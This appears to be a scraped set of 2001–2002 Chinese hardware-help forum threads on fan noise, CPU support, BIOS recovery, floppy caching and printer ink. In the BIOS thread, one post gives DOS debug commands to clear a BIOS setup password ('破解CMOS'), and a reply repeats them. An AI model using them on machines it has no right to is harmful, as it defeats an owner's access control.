发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-16 20:00:25 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
首先在dos下杀毒，再在安全模式下看是有什么问题，再检查硬件故障。。

WINDFLASH
::浅紫色FORUM::
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-16 20:09:13 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
应该是哪个硬件的事,不好判断,听不出是什么东西在响

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-16 20:16:18 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
你在进win98（是用这个吗？我最熟悉了）前检测了硬盘，光驱，内存没有？

你用的cpu散热好吗？

WINDFLASH
::浅紫色FORUM::
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-17 12:33:46 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
除了开机时的响声外在使用中没有任何问题. cpu的温度不知.

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-12-17 13:53:32 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
/一般拉傻在上个帖子中说
引用:
除了开机时的响声外在使用中没有任何问题. cpu的温度不知.

至少描述一下响声的特点，只是说开机异响，没有办法判断。

Dripping water wears away a stone.
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-17 18:13:37 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
进bois看看，你的是什么主板？能看cpu吗？是什么型号的 bois，是ami还是award的，响几下？你最好把你的情况说清楚点，好判断~

WINDFLASH
::浅紫色FORUM::
freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-17 18:22:48 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
不会是风扇吧！现在冷了！润滑油凝固了！

I am a freedog！
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-17 20:12:45 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
就是风扇啦
换一个就好了

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-17 20:56:03 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
赵鹏在上个帖子中说
引用:
就是风扇啦
换一个就好了

和和
这么肯定?

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
嘿嘿

坏笑
积分：403
发帖：525
来自：
注册：2001-10-06
 发表于 2001-12-18 10:52:21 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
你说的启动完是什么意思呢，到哪里才算启动完呢，不明白，希望能讲清楚点

如果刚开机就是黑屏的话最好能说说开机时的响声，如果有嘀嘀响的一般是内存和显卡的事，如果没有响声，就可能是CPU或电源的事。

缘是天定,份在人为.
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-18 11:55:18 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
从按下power到进入windows,声音低沉,不是硬件的报警声

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-18 13:01:27 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
呵呵，不用试了，我的机器也是这样，开机的时候有异常响声，不是硬件报警，而是什么碰撞摩擦的声音，过一会就好了。经过我仔细的观察，靠！就是CPU风扇运转不正常所致！也许是风扇中间的滚珠老化的原因（谁叫我开始没钱买个好点的！穷啊！……）换一个风扇，一切搞掂！^_^上帝保佑！

打雷了！下雨了！大家快回家收衣服啊……
上一贴 | 下一贴
快速回复 | 主题：最近几天开机是机器出现异响
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我的磐英Bx-5能否用赛扬2-800cpu

计算机技术
我的磐英Bx-5能否用赛扬2-800cpu

上一贴 | 下一贴
发表人 | 主题: 我的磐英Bx-5能否用赛扬2-800cpu
sonata 初级用户 积分：97 发帖：25 来自：河北省 注册：2001-09-05 | 发表于 2001-12-19 21:43:20 按此观看sonata的个人资料 按此发邮件给sonata sonata 的 oicq 是18858351,查看 18858351 的资料 收藏该主题供以后查看 发送悄悄话给sonata 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sonata的IP 我的C366实在顶不住了，恳请各位帮个忙，因为我不想换主板。 只要再克制一下，我就会解脱 ！
freedog 初级用户 积分：0 发帖：21 来自： 注册：2001-12-14 | 发表于 2001-12-19 21:48:22 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP 很明显，不行因为他支持中央处理器为 Intel 奔腾II，奔腾III，赛杨 主频范围 233MHz - 500MHz 而你想把c-II 当500的用的话！就行！ I am a freedog！
sonata 初级用户 积分：97 发帖：25 来自：河北省 注册：2001-09-05 | 发表于 2001-12-19 21:53:16 按此观看sonata的个人资料 按此发邮件给sonata sonata 的 oicq 是18858351,查看 18858351 的资料 发送悄悄话给sonata 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sonata的IP 把外频设为100也不行吗？ 只要再克制一下，我就会解脱 ！
freedog 初级用户 积分：0 发帖：21 来自： 注册：2001-12-14 | 发表于 2001-12-19 22:00:49 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP 当然，倍频最多支持5,所以只能到500!再说了！800是scoket370的，而主板支持slot1 还得换个转接卡！ I am a freedog！
上一贴 | 下一贴
快速回复 | 主题：我的磐英Bx-5能否用赛扬2-800cpu
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样屏敝掉主板自的声卡

计算机技术
怎样屏敝掉主板自的声卡

上一贴 | 下一贴
发表人 | 主题: 怎样屏敝掉主板自的声卡
jdrch 超级用户 积分：326 发帖：105 来自： 注册：2001-08-29 | 发表于 2001-12-18 11:48:29 按此观看jdrch的个人资料 按此发邮件给jdrch 收藏该主题供以后查看 发送悄悄话给jdrch 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jdrch的IP 我的声卡是主板自带的，每次一开机总是会大叫一声“爆音”，受不了它，想把它屏敝，要怎么办。 还有，顺便请大家给推荐一款1xx来块的声卡。 谢谢！！ 列寧同志曾說:撒謊是必要的，但同志們，得有個限度。
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-18 11:58:20 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 开机时按del 进入cmos里面设置找有关声卡的一下 改成disable~ 1**多的卡~推荐用创新sb128 挺好的~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
jdrch 超级用户 积分：326 发帖：105 来自： 注册：2001-08-29 | 发表于 2001-12-18 12:10:38 按此观看jdrch的个人资料 按此发邮件给jdrch 发送悄悄话给jdrch 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jdrch的IP 多谢强盗，但是创新的 sb128要两百多啊 列寧同志曾說:撒謊是必要的，但同志們，得有個限度。
上一贴 | 下一贴
快速回复 | 主题：怎样屏敝掉主板自的声卡
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


两按键鼠标可当作三键用？

计算机技术
两按键鼠标可当作三键用？

上一贴 | 下一贴
发表人 | 主题: 两按键鼠标可当作三键用？
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-20 13:15:03 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 收藏该主题供以后查看 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 骗人！某人说，在任意可编辑文本的窗口中，同时按下两键可以代替三键鼠标的滑轮的滚动翻页作用， 可我试了一下，没什么反应！！你有什么方法？ 活到老 学不了
POPOEVER N个蓝色大泡泡 版主 积分：19175 发帖：5030 来自：Keyframe G.L 注册：2000-07-17 | 发表于 2001-12-20 13:49:49 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP 是说这里论坛的页面吧，双击鼠标左键！ XTree 无可救药地活着，睡眼朦胧地醒着 Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-20 14:15:09 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 不是指这里。比如是在一般浏览较多网页内容需要下移的情况。起到代替鼠标中间轮的作用。 活到老 学不了
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-20 17:17:52 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 需要下载小程序吗？ 活到老 学不了
POPOEVER N个蓝色大泡泡 版主 积分：19175 发帖：5030 来自：Keyframe G.L 注册：2000-07-17 | 发表于 2001-12-20 17:35:43 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP Ctrl+上下方向键 XTree 无可救药地活着，睡眼朦胧地醒着 Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-21 08:31:08 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 学不如直接用上下键。 原来听说同时按左右两键，便出现一个上下两方向箭头，鼠标向下或向下移，便可翻动页面了。本想省钱不买三键的，看来省不了。 活到老 学不了
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-21 12:54:50 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 有这样的程序 你可以去 http://www.logitech.com.cn/service/download/mw_download_forXP.htm 下载全球著名的输入设备商罗技公司的鼠标驱动程序 驱动程序可以应用在非罗技生产的鼠标上 可以定义同时按两键产生第三键的效果 还可以出现增强菜单等 很好用的驱动 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 | 主题：两按键鼠标可当作三键用？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


BIOSaward命令求解

计算机技术
BIOSaward命令求解

上一贴 | 下一贴
发表人 主题: BIOSaward命令求解
小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2001-12-21 19:15:45 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 收藏该主题供以后查看 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
就是自动恢复的一行,哪位兄弟那有,给我一下,谢谢

小心者,心小也!
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-21 21:01:31 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
load bios defaults ，我的是ami的，可能不一样，大概一样吧，最笨的方法是放bois的电 ;)

WINDFLASH
::浅紫色FORUM::
lytkd

终级用户
积分：932
发帖：274
来自：China
注册：2000-12-02
 发表于 2001-12-21 22:14:50 按此观看lytkd的个人资料 按此发邮件给lytkd 发送悄悄话给lytkd 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lytkd的IP
yuzhiqing在上个帖子中说
引用:
load bios defaults ，我的是ami的，可能不一样，大概一样吧，最笨的方法是放bois的电 ;)

放电？？残忍
破解CMOS的debug用法目前我知道有5种。基本上问题可以解决了。
前提条件>>机器没有设置开机密码(如果设置了你不知道的密码的话,你根本就无法开机,更别提破解了,可以放电)

在dos提示符下输入
debug 回车

---------------
-O 70 16
-O 71 16
-Q
---------------
-O 70 11
-O 71 FF
-Q

---------------
-O 70 10
-O 71 10
-Q
---------------
-O 70 23
-O 71 34
-Q

---------------
-O 70 16
-O 71 FF
-Q

-----------------------------
-O ：将一个字节的数据送往I/O端口
70h是个只写的端口，设置CMOS中数据的读写地址，
端口71h就是在70h设置的地址进行读写的端口，写入数据11.
-Q :是退出debug的通用命令。
它有很多种写法，用其他高级语言一样可以用。
debug的用处非常大，这只是其应用的一个很小的部分。

注意:改完后,进入Cmos,记得要load默认值哦,不然无法开机的(个别情况)

流浪的小奀
小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2001-12-21 22:46:42 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
我是刷错了BIOS啊,不是设置错了.哎................就是用award自动刷回原来的BIN啊,假如我原来的是old.bin,请问用什么命令可以自动刷?

急!!!!!!!!!!!!!!!!!!!

小心者,心小也!
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-12-22 00:03:18 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
升级BIOS失败?启动系统读不读软驱?如果读,那还有救.
找一个ISA显卡,就可以点亮了,如果没有ISA显卡,就按以下步骤试试.
1.作一张DOS启动盘,只保留三个文件,一定不能有config.sys和autoexec.bat这两个文件.
2.将awdflash.exe和old.bin文件copy的软盘中.
3.在启动盘中建立一个autoexec.bat文件,打入以下内容:
awdflash.exe old.bin/sn/py
4.用此软盘启动系统,就会自动刷新了,等软驱灯不亮了,过一会儿就可以重新启动.
能否成功,就看你的运气了.

Dripping water wears away a stone.
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-22 02:53:22 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
刷BIOS失败的话
可以使用热插拔法恢复

前提条件：
1 准备好存放自己原先的BIOS的程序盘，此盘必须可引导机器启动
2 准备一个其它的接口相同的BIOS芯片

遵循如下步骤开始：
1 用新的BIOS芯片更换自己主板上的（不要插得太紧），并设置为A:优先启动
2 用软盘启动完成后，拔除新的BIOS芯片并换上原来自己的（轻手轻脚一些）
3 执行软盘上的自己的BIOS写入程序，这样就可以把内容重新写入BIOS芯片
OK

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2001-12-22 11:48:45 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
都是技嘉的@BIOS搞的！！！！没想到一连就不知道给我刷了什么东东．．．．．．．．．
哎．．．．．．．

小心者,心小也!
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2001-12-22 14:47:36 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
先找一台好的机器，模拟一下过程（注意是模拟），把每个步骤记下来，包括估算等待的时间，然后在自己的机器上恢复吧。我就是这样干的。
razor

初级用户
积分：30
发帖：15
来自：杭州
注册：2001-12-07
 发表于 2001-12-22 16:23:07 按此观看razor的个人资料 按此发邮件给razor 访问razor的主页 razor 的 oicq 是7605942,查看 7605942 的资料 发送悄悄话给razor 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看razor的IP
其实最安全的还是上网去把自己的那个主板的 bios下下来，再拿到电子市场去用编程器刷一下，大概30员吧

我是Razor
失落

初级用户
积分：0
发帖：1
来自：中国、广东、珠海
注册：2001-12-08
 发表于 2001-12-27 23:20:55 按此观看失落的个人资料 该用户不允许显示它的电子邮件 失落 的 oicq 是9212242,查看 9212242 的资料 发送悄悄话给失落 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看失落的IP
lytkd在上个帖子中说
引用:
yuzhiqing在上个帖子中说
引用:
load bios defaults ，我的是ami的，可能不一样，大概一样吧，最笨的方法是放bois的电 ;)

放电？？残忍
破解CMOS的debug用法目前我知道有5种。基本上问题可以解决了。
前提条件>>机器没有设置开机密码(如果设置了你不知道的密码的话,你根本就无法开机,更别提破解了,可以放电)

在dos提示符下输入
debug 回车

---------------
-O 70 16
-O 71 16
-Q
---------------
-O 70 11
-O 71 FF
-Q

---------------
-O 70 10
-O 71 10
-Q
---------------
-O 70 23
-O 71 34
-Q

---------------
-O 70 16
-O 71 FF
-Q

-----------------------------
-O ：将一个字节的数据送往I/O端口
70h是个只写的端口，设置CMOS中数据的读写地址，
端口71h就是在70h设置的地址进行读写的端口，写入数据11.
-Q :是退出debug的通用命令。
它有很多种写法，用其他高级语言一样可以用。
debug的用处非常大，这只是其应用的一个很小的部分。

注意:改完后,进入Cmos,记得要load默认值哦,不然无法开机的(个别情况)

我有一个更好的方法，它不会删去原来的密码但就可以得到它的呢！！！
想知，问我吧：）

其实我失落并不是我有什么不开心，而是我不能学懂所有的技巧！！
上一贴 | 下一贴
快速回复 | 主题：BIOSaward命令求解
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


软区疯了？？！！！

计算机技术
软区疯了？？！！！

上一贴 | 下一贴
发表人 | 主题: 软区疯了？？！！！
宇宙星云 终级用户 积分：474 发帖：305 来自：广州 注册：2000-12-13 | 发表于 2001-12-29 15:27:07 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP 朋友一网吧专用来排版打印的机器软区最近老是发生一怪问题： 无论打开那一张软盘，都显示最先一张盘的内容，刷新也没用，只有重启系统才可以恢复正常，请问怎么回事？？？难道要重新装系统？ ┏━━┓∴· oooO Oooo°∴┏━━┓ ┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃ ┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃ ┗━━┛★．° \_) (_/·．★┗━━┛
DayinNightout 超级用户 积分：338 发帖：150 来自：CCF 注册：2000-12-18 | 发表于 2001-12-29 15:43:15 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP 换根软区线试试 木有签名#@$%
QUESTER 鼠标说话 是个版主 积分：2604 发帖：1175 来自：GTA 注册：2000-08-28 | 发表于 2001-12-29 17:22:34 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP 可能和磁盘缓冲区设置有关，缓冲太大，没有及时清除，就老是标识为第一次使用的状态。 如果使用了Smartdrv，取消对软驱的缓冲可能解决此问题。 下载 ColorKey 试用版 解决配色问题 逢对手鼠标说话，仗一键快意恩仇！ ...乍暖還寒時候，最難將息... Blueidea Web Team Moderator of Art & Design
宇宙星云 终级用户 积分：474 发帖：305 来自：广州 注册：2000-12-13 | 发表于 2001-12-29 19:36:52 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP 不错，很有道理，谢谢QUESTER ┏━━┓∴· oooO Oooo°∴┏━━┓ ┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃ ┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃ ┗━━┛★．° \_) (_/·．★┗━━┛
上一贴 | 下一贴
快速回复 | 主题：软区疯了？？！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


蓝色的朋友，我的EPSON打印机打不出蓝色啦！！

计算机技术
蓝色的朋友，我的EPSON打印机打不出蓝色啦！！

上一贴 | 下一贴
发表人 主题: 蓝色的朋友，我的EPSON打印机打不出蓝色啦！！
飞速键盘

初级用户
积分：0
发帖：236
来自：HN-SZ
注册：2001-04-18
 发表于 2002-01-07 17:03:15 按此观看飞速键盘的个人资料 按此发邮件给飞速键盘 飞速键盘 的 oicq 是1730267,查看 1730267 的资料 收藏该主题供以后查看 发送悄悄话给飞速键盘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞速键盘的IP
昨天刚买一新彩墨盒，打印了一些图片。（耗蓝色的确是耗得比较多，但应该还是有蓝色墨吧，因为我甩了一下墨盒还能甩出蓝色来）
今天打印就出不了蓝色了。
进行喷嘴检查，本应该是黑色、蓝色、红色、黄色、浅蓝色、浅红色
可两块蓝色区完全空白。
清洗了一次打印头仍无效。

我该怎么办？？？

MSN: CLOUDY_KNOW@YEAH.NET
如果云知道...
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2002-01-07 17:56:09 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
修

或

买

等我想想再签
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2002-01-07 17:58:25 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
喷嘴检查 清洗打印头多几次~ 不然只有像楼上说的那样了~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

秋天的小乐

终级用户
积分：806
发帖：456
来自：京西
注册：2000-11-13
 发表于 2002-01-08 10:48:35 按此观看秋天的小乐的个人资料 按此发邮件给秋天的小乐 访问秋天的小乐的主页 秋天的小乐 的 oicq 是7545653,查看 7545653 的资料 发送悄悄话给秋天的小乐 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋天的小乐的IP
能甩也来不一定就能流畅的流出来。可能你的蓝墨里有什么东西堵住了出墨口，可能是包着喷墨嘴的塑料纸。如果你墨盒与喷嘴是连在一体的那也有可能是喷嘴有毛病了。我认为最有可能是没有墨了。甩出来的可能是粘在盒边的一点墨滴。

老婆被泡，马子被翘，脏款被盗，让汽车撞出人行道。
OICQ-7545653
飞速键盘

初级用户
积分：0
发帖：236
来自：HN-SZ
注册：2001-04-18
